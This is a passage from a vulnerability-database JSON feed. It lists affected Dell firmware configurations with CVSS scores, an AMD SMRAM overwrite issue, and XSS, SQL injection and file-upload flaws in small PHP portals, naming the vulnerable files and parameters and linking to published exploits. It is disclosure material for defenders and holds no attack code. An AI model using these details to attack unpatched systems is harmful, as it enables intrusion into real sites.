"cpe:2.3:o:dell:poweredge_t130_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t130:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r230_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r230:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx3240_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx3240:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx3340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx3340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx3230_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx3230:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx3330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx3330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.16.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc660_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc660:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc760_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc760:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc7625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc7625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc7525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc7525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_6420_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_6420_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc640_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc640_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc740xd_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc740xd_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc740xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc740xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc940_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc940_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xcxr2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xcxr2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc6320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc6320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc730_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc730:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc730xd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc730xd:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 3.3, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-03-13T17:15Z", "lastModifiedDate" : "2025-01-31T15:40Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0179", "ASSIGNER" : "psirt@amd.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7027.html", "name" : "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7027.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "SMM Callout vulnerability within the AmdCpmDisplayFeatureSMM driver could allow locally authenticated attackers to overwrite SMRAM, potentially resulting in arbitrary code execution." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-11T21:15Z", "lastModifiedDate" : "2025-02-11T21:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0181", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/3Yc2iRzY#Uv7ECzLwUvff__JXEcyPG9oxJ0A1fsBIFGVaS35pvtA", "name" : "https://mega.nz/file/3Yc2iRzY#Uv7ECzLwUvff__JXEcyPG9oxJ0A1fsBIFGVaS35pvtA", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/3Yc2iRzY#Uv7ECzLwUvff__JXEcyPG9oxJ0A1fsBIFGVaS35pvtA", "name" : "https://mega.nz/file/3Yc2iRzY#Uv7ECzLwUvff__JXEcyPG9oxJ0A1fsBIFGVaS35pvtA", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249433", "name" : "https://vuldb.com/?ctiid.249433", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249433", "name" : "https://vuldb.com/?ctiid.249433", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249433", "name" : "https://vuldb.com/?id.249433", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249433", "name" : "https://vuldb.com/?id.249433", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/admin_user.php of the component Admin Panel. The manipulation of the argument Firstname/Lastname/Username leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249433 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nia:rrj_nueva_ecija_engineer_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-01T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0182", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.249440", "name" : "VDB-249440 | CTI Indicators", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249440", "name" : "VDB-249440 | CTI Indicators", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249440", "name" : "VDB-249440 | SourceCodester Engineers Online Portal Admin Login sql injection", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249440", "name" : "VDB-249440 | SourceCodester Engineers Online Portal Admin Login sql injection", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/ of the component Admin Login. The manipulation of the argument username/password leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-249440." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:janobe:engineers_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-01T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0183", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/SB8ylCxQ#vSaXJwbNjeG-KXatgkxE8XI6Cmnv-A_Sg2IjvoJZs0E", "name" : "https://mega.nz/file/SB8ylCxQ#vSaXJwbNjeG-KXatgkxE8XI6Cmnv-A_Sg2IjvoJZs0E", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/SB8ylCxQ#vSaXJwbNjeG-KXatgkxE8XI6Cmnv-A_Sg2IjvoJZs0E", "name" : "https://mega.nz/file/SB8ylCxQ#vSaXJwbNjeG-KXatgkxE8XI6Cmnv-A_Sg2IjvoJZs0E", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249441", "name" : "https://vuldb.com/?ctiid.249441", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249441", "name" : "https://vuldb.com/?ctiid.249441", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249441", "name" : "https://vuldb.com/?id.249441", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249441", "name" : "https://vuldb.com/?id.249441", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/students.php of the component NIA Office. The manipulation leads to basic cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249441 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nia:rrj_nueva_ecija_engineer_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-01T23:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0184", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/eN8yEKSA#YCJNH1v4BKOG2xyxOZYPIuO3Oz7biv2ugfarAI5n_3k", "name" : "https://mega.nz/file/eN8yEKSA#YCJNH1v4BKOG2xyxOZYPIuO3Oz7biv2ugfarAI5n_3k", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/eN8yEKSA#YCJNH1v4BKOG2xyxOZYPIuO3Oz7biv2ugfarAI5n_3k", "name" : "https://mega.nz/file/eN8yEKSA#YCJNH1v4BKOG2xyxOZYPIuO3Oz7biv2ugfarAI5n_3k", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249442", "name" : "https://vuldb.com/?ctiid.249442", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249442", "name" : "https://vuldb.com/?ctiid.249442", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249442", "name" : "https://vuldb.com/?id.249442", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249442", "name" : "https://vuldb.com/?id.249442", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/edit_teacher.php of the component Add Enginer. The manipulation of the argument Firstname/Lastname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249442 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nia:rrj_nueva_ecija_engineer_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-02T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0185", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/PBd13AoR#G3fYWB82wGCa7sD22JP3_twtbw3B0qSJ-4eMMrYR5cE", "name" : "https://mega.nz/file/PBd13AoR#G3fYWB82wGCa7sD22JP3_twtbw3B0qSJ-4eMMrYR5cE", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/PBd13AoR#G3fYWB82wGCa7sD22JP3_twtbw3B0qSJ-4eMMrYR5cE", "name" : "https://mega.nz/file/PBd13AoR#G3fYWB82wGCa7sD22JP3_twtbw3B0qSJ-4eMMrYR5cE", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249443", "name" : "https://vuldb.com/?ctiid.249443", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249443", "name" : "https://vuldb.com/?ctiid.249443", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249443", "name" : "https://vuldb.com/?id.249443", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249443", "name" : "https://vuldb.com/?id.249443", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been rated as critical. This issue affects some unknown processing of the file dasboard_teacher.php of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249443." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : 